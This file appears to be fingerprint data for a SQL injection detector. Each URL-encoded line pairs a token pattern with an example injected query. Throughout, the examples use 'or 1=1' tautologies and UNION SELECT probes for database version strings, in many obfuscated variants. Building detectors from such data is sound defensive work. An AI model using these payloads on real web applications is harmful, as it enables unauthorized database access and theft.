%26%28%29o1%3A+select+%2A+from+users+where+id%3D1+or+%28%5C%29%3D1+union+select+1%2C%40%40VERSION+--+1
%26%28.%29o%3A+select+%2A+from+users+where+id%3D1+or+%28%5C.%29%3D1+union+select+1%2C%40%40VERSION+--+1
%26%281%261%3A+select+%2A+from+users+where+id%3D1+or+%28%5C%2B%29%3D1+or+1%3D1+--+1
%26%281%29o%3A+select+%2A+from+users+where+id%3D1+or+%281%29%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
%26%281UE%3A+select+%2A+from+users+where+id%3D1+or+%28%5C%2B%29%3D1+union+select+1%2C%40%40VERSION+--+1
%26%28n%261%3A+select+%2A+from+users+where+id%3D1+or+%28%24%2B%29%3D1+or+1%3D1+--+1
%26%28nUE%3A+select+%2A+from+users+where+id%3D1+or+%28%24%2B%29%3D1+union+select+1%2C%40%40VERSION+--+1
%26.o%261%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C%5C+or+1%3D1+--+1
%26.o1%26%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C1+or+1%3D1+--+1
%26.o1U%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C1+union+select+1%2C%40%40VERSION+--+1
%26.oUE%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C%5C+union+select+1%2C%40%40VERSION+--+1
%26.on%26%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C%24+or+1%3D1+--+1
%26.onU%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C%24+union+select+1%2C%40%40VERSION+--+1
%26.oo1%3A+select+%2A+from+users+where+id%3D1+or+%5C.%3C+%3D1+union+select+1%2C%40%40VERSION+--+1
%261UE1%3A+select+%2A+from+users+where+id%3D1+%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
%261UEv%3A+select+%2A+from+users+where+id%3D1+%7C%7C1+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
%261c%3A+select+%2A+from+users+where+id%3D1+++or+1%3D1+--+1
%261oo%26%3A+select+%2A+from+users+where+id%3D1+or+%5C%2B%3C%5C+or+1%3D1+--+1
%261oo1%3A+select+%2A+from+users+where+id%3D1+or++1%3C%40%3D1+union+select+1%2Cversion%28%29+--+1
%261ooU%3A+select+%2A+from+users+where+id%3D1+or+%5C%2B%3C%5C+union+select+1%2C%40%40VERSION+--+1
%261oon%3A+select+%2A+from+users+where+id%3D1+or+%5C%2B%3C%24+union+select+1%2C%40%40VERSION+--+1
%261ovc%3A+select+%2A+from+users+where+id%3D1+or+1%26%40%23%3D1+union+select+1%2Cversion%28%29+--+1
%26n.o1%3A+select+%2A+from+users+where+id%3D1+or+%24+.%3D1+union+select+1%2C%40%40VERSION+--+1
%26n1%261%3A+select+%2A+from+users+where+id%3D1+or+%24+1%3D1+or+1%3D1+--+1
%26n1UE%3A+select+%2A+from+users+where+id%3D1+or+%24+1%3D1+union+select+1%2C%40%40VERSION+--+1
%26no%261%3A+select+%2A+from+users+where+id%3D1+or+%24%3C%5C+or+1%3D1+--+1
%26no.%26%3A+select+%2A+from+users+where+id%3D1+or+%24%3C%5C.+or+1%3D1+--+1
%26no.U%3A+select+%2A+from+users+where+id%3D1+or+%24%3C%5C.+union+select+1%2C%40%40VERSION+--+1
%26noUE%3A+select+%2A+from+users+where+id%3D1+or+%24%3C%5C+union+select+1%2C%40%40VERSION+--+1
%26noo%26%3A+select+%2A+from+users+where+id%3D1+or+%24%2B%3C%5C+or+1%3D1+--+1
%26noo1%3A+select+%2A+from+users+where+id%3D1+or+%24%2B%3C1+union+select+1%2C%40%40VERSION+--+1
%26nooU%3A+select+%2A+from+users+where+id%3D1+or+%24%2B%3C%5C+union+select+1%2C%40%40VERSION+--+1
%26noon%3A+select+%2A+from+users+where+id%3D1+or+%24%2B%3C%24+union+select+1%2C%40%40VERSION+--+1
%26o.%261%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%5C.+or+1%3D1+--+1
%26o.UE%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%5C.+union+select+1%2C%40%40VERSION+--+1
%26o1%261%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C1+or+1%3D1+--+1
%26o1UE%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C1+union+select+1%2C%40%40VERSION+--+1
%26oUE1%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%5C+union+select+1%2C%40%40VERSION+--+1
%26oUEv%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%5C+union+select+null%2C%40%40VERSION+--+1
%26on%261%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%24+or+1%3D1+--+1
%26onUE%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C%24+union+select+1%2C%40%40VERSION+--+1
%26oo1%26%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C+%3D1+or+1%3D1+--+1
%26oo1U%3A+select+%2A+from+users+where+id%3D1+or+%5C%3C+%3D1+union+select+1%2C%40%40VERSION+--+1
%26ov%261%3A+select+%2A+from+users+where+id%3D1+or+%21%3C%40+or+1%3D1+--+1
%26ovUE%3A+select+%2A+from+users+where+id%3D1+or+%21%3C%40+union+select+1%2Cversion%28%29+--+1
%26v%3A+select+%2A+from+users+where+id%3D1+or+%40%60%5C%60+union+select+1%2Cversion%28%29+--+1
%26vc%3A+select+%2A+from+users+where+id%3D1+or++%40%24%23%3D1+union+select+1%2Cversion%28%29+--+1
%26voo1%3A+select+%2A+from+users+where+id%3D1+or+%40%3C%40%3D1+union+select+1%2Cversion%28%29+--+1
%29%261c%3A+select+%2A+from+users+where+id%3D1+%2B%28%5C%29+or+1%3D1+--+1
%29UEvc%3A+select+%2A+from+users+where+id%3D1+%2B%28%5C%29+union+select+null%2C%40%40VERSION+--+1
.%261UE%3A+select+%2A+from+users+where+id%3D1.%26%261+union+select+1%2Cversion%28%29+--+1
.%261c%3A+select+%2A+from+users+where+id%3D1.+or+1%3D1+--+1
.%26vUE%3A+select+%2A+from+users+where+id%3D1.%26%26%40+union+select+1%2Cversion%28%29+--+1
.%29%261c%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C.%29+or+1%3D1+--+1
.%29UEv%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C.%29+union+select+null%2C%40%40VERSION+--+1
.UE1%2C%3A+select+%2A+from+users+where+id%3D1.++union+select+1%2Cversion%28%29+--+1
.UE1k%3A+select+%2A+from+users+where+id%3D1.+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
.UEf%28%3A+select+%2A+from+users+where+id%3D1.++union+select+version%28%29%2Cversion%28%29+--+1
.UEv%2C%3A+select+%2A+from+users+where+id%3D1.+union+select+null%2Cversion%28%29+--+1
.UEvc%3A+select+%2A+from+users+where+id%3D1+%2B%5C.+union+select+null%2C%40%40VERSION+--+1
.UEvk%3A+select+%2A+from+users+where+id%3D1.+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
.o%261c%3A+select+%2A+from+users+where+id%3D1.+%3C%40+or+1%3D1+--+1
.o.%261%3A+select+%2A+from+users+where+id%3D1.%3C%40.+or+1%3D1+--+1
.o.UE%3A+select+%2A+from+users+where+id%3D1.%3C%40.+union+select+1%2Cversion%28%29+--+1
.o1%261%3A+select+%2A+from+users+where+id%3D1.%2A1+or+1%3D1+--+1
.o1UE%3A+select+%2A+from+users+where+id%3D1.%2A1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
.o1c%3A+select+%2A+from+users+where+id%3D1.%3C1%23+union+select+1%2Cversion%28%29+--+1
.oUE1%3A+select+%2A+from+users+where+id%3D1.+%3C%40+union+select+1%2Cversion%28%29+--+1
.oUEf%3A+select+%2A+from+users+where+id%3D1.+%3C%40+union+select+version%28%29%2Cversion%28%29+--+1
.oUEv%3A+select+%2A+from+users+where+id%3D1.%2A%5C+union+select+null%2C%40%40VERSION+--+1
.on%261%3A+select+%2A+from+users+where+id%3D1.%3C%40%24+or+1%3D1+--+1
.onUE%3A+select+%2A+from+users+where+id%3D1.%3C%40%24+union+select+1%2Cversion%28%29+--+1
.ov%261%3A+select+%2A+from+users+where+id%3D1.%25%40+or+1%3D1+--+1
.ovUE%3A+select+%2A+from+users+where+id%3D1.%25%40+union+select+1%2Cversion%28%29+--+1
1%261UE%3A+select+%2A+from+users+where+id%3D11%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
1%261c%3A+select+%2A+from+users+where+id%3D1+%2B1+or+1%3D1+--+1
1%29%261c%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+or+1%3D1+--+1
1%29UE1%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
1%29UEv%3A+select+%2A+from+users+where+id%3D1+%2B%281%29+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
1UE1k%3A+select+%2A+from+users+where+id%3D1+%2B1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
1UEvk%3A+select+%2A+from+users+where+id%3D1+%2B1+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
1c%3A+select+%2A+from+users+where+id%3D11%3C1%23+union+select+1%2Cversion%28%29+--+1
1o%29%261%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C%2B%29+or+1%3D1+--+1
1o%29UE%3A+select+%2A+from+users+where+id%3D1+%2B+%28%5C%2B%29+union+select+null%2C%40%40VERSION+--+1
1o.UE%3A+select+%2A+from+users+where+id%3D1+%2B%5C%2B.+union+select+null%2C%40%40VERSION+--+1
1oUE1%3A+select+%2A+from+users+where+id%3D1+-1%3C%40+union+select+1%2Cversion%28%29+--+1
1oUEf%3A+select+%2A+from+users+where+id%3D1+%2B1%3C%40+union+select+version%28%29%2Cversion%28%29+--+1
1oUEv%3A+select+%2A+from+users+where+id%3D1+%2B1%3C%40+union+select+null%2Cversion%28%29+--+1
1oo%261%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%25%5C+or+1%3D1+--+1
1oo1%26%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%251+or+1%3D1+--+1
1oo1U%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%251+union+select+null%2C%40%40VERSION+--+1
1ooUE%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%2A%5C+union+select+null%2C%40%40VERSION+--+1
1oon%26%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%25%24+or+1%3D1+--+1
1oonU%3A+select+%2A+from+users+where+id%3D1+%2B+%5C%2B%2A%24+union+select+null%2C%40%40VERSION+--+1
UE%281%29%3A+select+%2A+from+users+where+id%3D1+union+select+%281%29%2Cbanner+from+v%24version+where+rownum%3D1+--+1
UE1%261%3A+select+%2A+from+users+where+id%3D1+union+select+1%7C%7C1%2Cversion%28%29+--+1
UE1%26v%3A+select+%2A+from+users+where+id%3D1+union+select+1%7C%7C%40%2Cversion%28%29+--+1
UE111%3A+select+%2A+from+users+where+id%3D1+union+select+1+1%24%2Cversion%28%29+--+1
UE11f%3A+select+%2A+from+users+where+id%3D1+union+select+1+%24%2Cversion%28%29+--+1
UE11n%3A+select+%2A+from+users+where+id%3D1+union+select+1+1a%2Cversion%28%29+--+1
UE1f%28%3A+select+%2A+from+users+where+id%3D1+union+select+1%3C%40%24%2Cversion%28%29+--+1
UE1kn%3A+select+%2A+from+users+where+id%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
UE1n%2C%3A+select+%2A+from+users+where+id%3D1+union+select+.1_%2Cversion%28%29+--+1
UE1n%3A+select+%2A+from+users+where+id%3D1+union+select+1%60%5C%60%2Cversion%28%29+--+1
UE1nc%3A+select+%2A+from+users+where+id%3D1+union+select+1a%23%2Cbanner+from+v%24version+where+rownum%3D1+--+1
UE1nk%3A+select+%2A+from+users+where+id%3D1+union+select+1a%2Cbanner+from+v%24version+where+rownum%3D1+--+1
UE1nn%3A+select+%2A+from+users+where+id%3D1+union+select+.1%24_%2Cversion%28%29+--+1
UE1o%2C%3A+select+%2A+from+users+where+id%3D1+union+select+1%3C%40%2Cversion%28%29+--+1
UE1o.%3A+select+%2A+from+users+where+id%3D1+union+select+1%3C%40.%2Cversion%28%29+--+1
UE1s%3A+select+%2A+from+users+where+id%3D1+union+select+1+%24%24%2Cversion%28%29+--+1
UEo1%2C%3A+select+%2A+from+users+where+id%3D1+union+select+%21%3C1%2Cversion%28%29+--+1
UEoo1%3A+select+%2A+from+users+where+id%3D1+union+select+%2B%21%3C1%2Cversion%28%29+--+1
UEoov%3A+select+%2A+from+users+where+id%3D1+union+select+%2B%21%3C%40%2Cversion%28%29+--+1
UEov%2C%3A+select+%2A+from+users+where+id%3D1+union+select+%21%3C%40%2Cversion%28%29+--+1
UEv%261%3A+select+%2A+from+users+where+id%3D1+union+select+%40%7C%7C1%2Cversion%28%29+--+1
UEv%26v%3A+select+%2A+from+users+where+id%3D1+union+select+%40%26%26%40%2Cversion%28%29+--+1
UEv11%3A+select+%2A+from+users+where+id%3D1+union+select+%40+1%24%2Cversion%28%29+--+1
UEv1f%3A+select+%2A+from+users+where+id%3D1+union+select++%40+%24%2Cversion%28%29+--+1
UEv1n%3A+select+%2A+from+users+where+id%3D1+union+select+%40+1a%2Cversion%28%29+--+1
UEvf%28%3A+select+%2A+from+users+where+id%3D1+union+select+%40%3C%40%24%2Cversion%28%29+--+1
UEvkn%3A+select+%2A+from+users+where+id%3D1+++union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
UEvn%2C%3A+select+%2A+from+users+where+id%3D1+union+select+%40+_%2Cversion%28%29+--+1
UEvnn%3A+select+%2A+from+users+where+id%3D1+union+select+%40+%24_%2Cversion%28%29+--+1
UEvo%2C%3A+select+%2A+from+users+where+id%3D1+union+select+%40%3C%40%2Cversion%28%29+--+1
UEvo.%3A+select+%2A+from+users+where+id%3D1+union+select+%40%3C%40.%2Cversion%28%29+--+1
UEvs%3A+select+%2A+from+users+where+id%3D1+union+select+%40+%24%24%2Cversion%28%29+--+1
n.%261c%3A+select+%2A+from+users+where+id%3D1+%2B%24+.+or+1%3D1+--+1
n.UEv%3A+select+%2A+from+users+where+id%3D1+%2B%24+.+union+select+null%2C%40%40VERSION+--+1
n1%261c%3A+select+%2A+from+users+where+id%3D1+%2B%24+1+or+1%3D1+--+1
n1UEv%3A+select+%2A+from+users+where+id%3D1+%2B%24+1+union+select+null%2C%40%40VERSION+--+1
no%261c%3A+select+%2A+from+users+where+id%3D1+%2B%24%2B+or+1%3D1+--+1
no%29%261%3A+select+%2A+from+users+where+id%3D1+%2B+%28%24%2B%29+or+1%3D1+--+1
no%29UE%3A+select+%2A+from+users+where+id%3D1+%2B+%28%24%2B%29+union+select+null%2C%40%40VERSION+--+1
no.%261%3A+select+%2A+from+users+where+id%3D1+%2B%24%2B.+or+1%3D1+--+1
no.UE%3A+select+%2A+from+users+where+id%3D1+%2B%24%2B.+union+select+null%2C%40%40VERSION+--+1
noUEv%3A+select+%2A+from+users+where+id%3D1+%2B%24%2B+union+select+null%2C%40%40VERSION+--+1
noo%261%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%25%5C+or+1%3D1+--+1
noo1%26%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%251+or+1%3D1+--+1
noo1U%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%251+union+select+null%2C%40%40VERSION+--+1
nooUE%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%2A%5C+union+select+null%2C%40%40VERSION+--+1
noon%26%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%25%24+or+1%3D1+--+1
noonU%3A+select+%2A+from+users+where+id%3D1+%2B+%24%2B%2A%24+union+select+null%2C%40%40VERSION+--+1
o%261c%3A+select+%2A+from+users+where+id%3D1+%3C%40+or+1%3D1+--+1
o%28%29%261%3A+select+%2A+from+users+where+id%3D1+%25%28%5C%29+or+1%3D1+--+1
o%28%29UE%3A+select+%2A+from+users+where+id%3D1+%2A%28%5C%29+union+select+null%2C%40%40VERSION+--+1
o%281%29%26%3A+select+%2A+from+users+where+id%3D1+%25%281%29+or+1%3D1+--+1
o%281%29U%3A+select+%2A+from+users+where+id%3D1+%2A%281%29+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
o%28n%29%26%3A+select+%2A+from+users+where+id%3D1+%25%28%24%29+or+1%3D1+--+1
o%28v%29%26%3A+select+%2A+from+users+where+id%3D1+%25%28%40%29+or+1%3D1+--+1
o.%261c%3A+select+%2A+from+users+where+id%3D1+%3C%40.+or+1%3D1+--+1
o..%261%3A+select+%2A+from+users+where+id%3D1+%3C%40..+or+1%3D1+--+1
o..UE%3A+select+%2A+from+users+where+id%3D1%3C%40..+union+select+1%2Cversion%28%29+--+1
o.UE1%3A+select+%2A+from+users+where+id%3D1+%3C%40.+union+select+1%2Cversion%28%29+--+1
o.UEf%3A+select+%2A+from+users+where+id%3D1++%3C%40.+union+select+version%28%29%2Cversion%28%29+--+1
o.UEv%3A+select+%2A+from+users+where+id%3D1+%2A%5C.+union+select+null%2C%40%40VERSION+--+1
o.n%261%3A+select+%2A+from+users+where+id%3D1+%3C%40.%24+or+1%3D1+--+1
o.nUE%3A+select+%2A+from+users+where+id%3D1+%3C%40.%24+union+select+1%2Cversion%28%29+--+1
o1%261c%3A+select+%2A+from+users+where+id%3D1+%2A1+or+1%3D1+--+1
o1UE1%3A+select+%2A+from+users+where+id%3D1+%2A1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
o1UEv%3A+select+%2A+from+users+where+id%3D1+%2A1+union+select+null%2Cbanner+from+v%24version+where+rownum%3D1+--+1
o1c%3A+select+%2A+from+users+where+id%3D1+%3C1%23%23+union+select+1%2Cversion%28%29+--+1
o1n%261%3A+select+%2A+from+users+where+id%3D1+%3C%401%24+or+1%3D1+--+1
o1nUE%3A+select+%2A+from+users+where+id%3D1+%3C%401%24+union+select+1%2Cversion%28%29+--+1
oUEvc%3A+select+%2A+from+users+where+id%3D1+%2A%5C+union+select+null%2C%40%40VERSION+--+1
on%261c%3A+select+%2A+from+users+where+id%3D1+%3C%40%24+or+1%3D1+--+1
on.%261%3A+select+%2A+from+users+where+id%3D1+%25%24+.+or+1%3D1+--+1
on.UE%3A+select+%2A+from+users+where+id%3D1+%2A%24+.+union+select+null%2C%40%40VERSION+--+1
on1%261%3A+select+%2A+from+users+where+id%3D1+%25%24+1+or+1%3D1+--+1
on1UE%3A+select+%2A+from+users+where+id%3D1+%25%24+1+union+select+null%2C%40%40VERSION+--+1
onn%261%3A+select+%2A+from+users+where+id%3D1+%3C%40%24_+or+1%3D1+--+1
onnUE%3A+select+%2A+from+users+where+id%3D1+%3C%40%24_+union+select+1%2Cversion%28%29+--+1
oo%261c%3A+select+%2A+from+users+where+id%3D1+%3C%40%3C%40+or+1%3D1+--+1
oo1%261%3A+select+%2A+from+users+where+id%3D1+%25%21%3C1+or+1%3D1+--+1
oo1UE%3A+select+%2A+from+users+where+id%3D1+%7C+%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1
ooUE1%3A+select+%2A+from+users+where+id%3D1%3C%40%3C%40+union+select+1%2Cversion%28%29+--+1
ooUEf%3A+select+%2A+from+users+where+id%3D1+%3C%40%3C%40+union+select+version%28%29%2Cversion%28%29+--+1
ooUEv%3A+select+%2A+from+users+where+id%3D1+%3C%40%3C%40+union+select+null%2Cversion%28%29+--+1
oov%261%3A+select+%2A+from+users+where+id%3D1+%25%21%3C%40+or+1%3D1+--+1
oovUE%3A+select+%2A+from+users+where+id%3D1+%3C%40%26%40+union+select+1%2Cversion%28%29+--+1
os%3A+select+%2A+from+users+where+id%3D1+%3C%40%24%24+union+select+1%2Cversion%28%29+--+1
ov%261c%3A+select+%2A+from+users+where+id%3D1+%26%40+or+1%3D1+--+1
s%26%26o1%3A+select+%2A+from+users+where+id%3D%271%27+or+%7C%7C%2F1%3D1+union+select+1%2Cversion%28%29+--+1%27
s%26%28%29o%3A+select+%2A+from+users+where+id%3D%271%27+or+%28%5C%29%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%26%28.%29%3A+select+%2A+from+users+where+id%3D%271%27+or+%28%5C.%29%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%26%281%29%3A+select+%2A+from+users+where+id%3D%271%27+or+%281%29%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
s%26.o%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%5C+or+1%3D1+--+1%27
s%26.o1%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C1+union+select+1%2C%40%40VERSION+--+1%27
s%26.oU%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%5C+union+select+1%2C%40%40VERSION+--+1%27
s%26.on%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C%24+union+select+1%2C%40%40VERSION+--+1%27
s%26.oo%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C.%3C+%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%261UE%3A+select+%2A+from+users+where+id%3D%271%27+%7C%7C1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
s%261c%3A+select+%2A+from+users+where+id%3D%271%27+++or+1%3D1+--+1%27
s%261oo%3A+select+%2A+from+users+where+id%3D%271%27+or+1%5E%3D1+union+select+1%2Cbanner+from+v%24version+where+rownum%3D1+--+1%27
s%26n.o%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+.%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%26n1%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+1%3D1+or+1%3D1+--+1%27
s%26n1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%24+1%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%26no%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C+or+1%3D1+--+1%27
s%26no.%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C.+union+select+1%2C%40%40VERSION+--+1%27
s%26noU%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%3C%5C+union+select+1%2C%40%40VERSION+--+1%27
s%26noo%3A+select+%2A+from+users+where+id%3D%271%27+or+%24%2B%3C%24+union+select+1%2C%40%40VERSION+--+1%27
s%26o.%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C.+or+1%3D1+--+1%27
s%26o.U%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C.+union+select+1%2C%40%40VERSION+--+1%27
s%26o1%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C1+or+1%3D1+--+1%27
s%26o1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C1+union+select+1%2Cversion%28%29+--+1%27
s%26oUE%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%5C+union+select+1%2C%40%40VERSION+--+1%27
s%26on%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%24+or+1%3D1+--+1%27
s%26onU%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C%24+union+select+1%2C%40%40VERSION+--+1%27
s%26oo1%3A+select+%2A+from+users+where+id%3D%271%27+or+%5C%3C+%3D1+union+select+1%2C%40%40VERSION+--+1%27
s%26ov%26%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C%40+or+1%3D1+--+1%27
s%26ovU%3A+select+%2A+from+users+where+id%3D%271%27+or+%21%3C%40+union+select+1%2Cversion%28%29+--+1%27
s%26v%281%3A+select+%2A+from+users+where+id%3D%271%27+or+%40%281%29%3D1+union+select+1%2Cversion%28%29+--+1%27
s%26v1U%3A+select+%2A+from+users+where+id%3D%271%27+or+%40+1%3D1+union+select+1%2Cversion%28%29+--+1%27
s%26vvU%3A+select+%2A+from+users+where+id%3D%271%27+or+%40+%401%3D1+union+select+1%2Cversion%28%29+--+1%27
s%28%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%28%29%22+or+1%3D1+--+1
s%28%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%28%2C%22%3D1+or+1%3D1+--+1
s%28.s%3A+select+%2A+from+users+where+id%3D1+or+%22%28.%22+or+1%3D1+--+1
s%281s%3A+select+%2A+from+users+where+id%3D1+or+%22%281%22+or+1%3D1+--+1
s%28%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%28%3A%22+or+1%3D1+--+1
s%28%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%28%3B%22+or+1%3D1+--+1
s%28%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%28%5D%22+or+1%3D1+--+1
s%28UE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%28+union+select+1%2Cversion%28%29+--+1
s%28UEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%28+union+select+version%28%29%2Cversion%28%29+--+1
s%28UEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%28+union+select+%27a%27%2Cversion%28%29+--+1
s%28UEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%28+union+select+null%2Cversion%28%29+--+1
s%28c%3A+select+%2A+from+users+where+id%3D1+or+%22%28%23%22+or+1%3D1+--+1
s%28n%3A+select+%2A+from+users+where+id%3D1+or+%22%28%5B%22+or+1%3D1+--+1
s%28ns%3A+select+%2A+from+users+where+id%3D1+or+%22%28_%22+or+1%3D1+--+1
s%28o1%26%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%28%3D1+or+1%3D1+--+1
s%28o1U%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%28%3D1+union+select+1%2Cversion%28%29+--+1
s%28os%3A+select+%2A+from+users+where+id%3D1+or+%22%28%26%22+or+1%3D1+--+1
s%28v%3A+select+%2A+from+users+where+id%3D1+or+%22%28%40%22+or+1%3D1+--+1
s%28%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%28%7B%22+or+1%3D1+--+1
s%29%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%29%28%22%3D1+or+1%3D1+--+1
s%29%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%29%2C%22+or+1%3D1+--+1
s%29.s%3A+select+%2A+from+users+where+id%3D1+or+%22%29.%22%3D1+or+1%3D1+--+1
s%291s%3A+select+%2A+from+users+where+id%3D1+or+%22%291%22+or+1%3D1+--+1
s%29%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%29%3A%22+or+1%3D1+--+1
s%29%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%29%3B%22+or+1%3D1+--+1
s%29%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%29%5D%22+or+1%3D1+--+1
s%29n%3A+select+%2A+from+users+where+id%3D1+or+%22%29%5B%22+or+1%3D1+--+1
s%29ns%3A+select+%2A+from+users+where+id%3D1+or+%22%29%24%22+or+1%3D1+--+1
s%29v%3A+select+%2A+from+users+where+id%3D1+or+%22%29%40%22+or+1%3D1+--+1
s%29%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%29%7B%22+or+1%3D1+--+1
s%2C%28s%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%28%22+or+1%3D1+--+1
s%2C%29s%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%29%22%3D1+or+1%3D1+--+1
s%2C%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%2C%22%3D1+or+1%3D1+--+1
s%2C.s%3A+select+%2A+from+users+where+id%3D1+or+%22%2C.%22+or+1%3D1+--+1
s%2C%3As%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%3A%22%3D1+or+1%3D1+--+1
s%2C%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%3B%22+or+1%3D1+--+1
s%2C%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%3F%22+or+1%3D1+--+1
s%2CUE1%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C+union+select+1%2Cversion%28%29+--+1
s%2CUEf%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C+union+select+version%28%29%2Cversion%28%29+--+1
s%2CUEs%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C+union+select+%27a%27%2Cversion%28%29+--+1
s%2CUEv%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C+union+select+null%2Cversion%28%29+--+1
s%2Cc%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%23%22+or+1%3D1+--+1
s%2Co1%26%3A+select+%2A+from+users+where+id%3D1+or+1%23%22%2C%3D1+or+1%3D1+--+1
s%2Co1U%3A+select+%2A+from+users+where+id%3D1+or+%40%23%22%2C%3D1+union+select+1%2Cversion%28%29+--+1
s%2Cos%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%26%22+or+1%3D1+--+1
s%2C%7Bs%3A+select+%2A+from+users+where+id%3D1+or+%22%2C%7B%22+or+1%3D1+--+1
s.%28s%3A+select+%2A+from+users+where+id%3D1+or+%22.%28%22+or+1%3D1+--+1
s.%29s%3A+select+%2A+from+users+where+id%3D1+or+%22.%29%22+or+1%3D1+--+1
s.%2Cs%3A+select+%2A+from+users+where+id%3D1+or+%22.%2C%22+or+1%3D1+--+1
s..s%3A+select+%2A+from+users+where+id%3D1+or+%22..%22%3D1+or+1%3D1+--+1
s.%3As%3A+select+%2A+from+users+where+id%3D1+or+%22.%3A%22%3D1+or+1%3D1+--+1
s.%3Bs%3A+select+%2A+from+users+where+id%3D1+or+%22.%3B%22+or+1%3D1+--+1
s.%3Fs%3A+select+%2A+from+users+where+id%3D1+or+%22.%5D%22+or+1%3D1+--+1
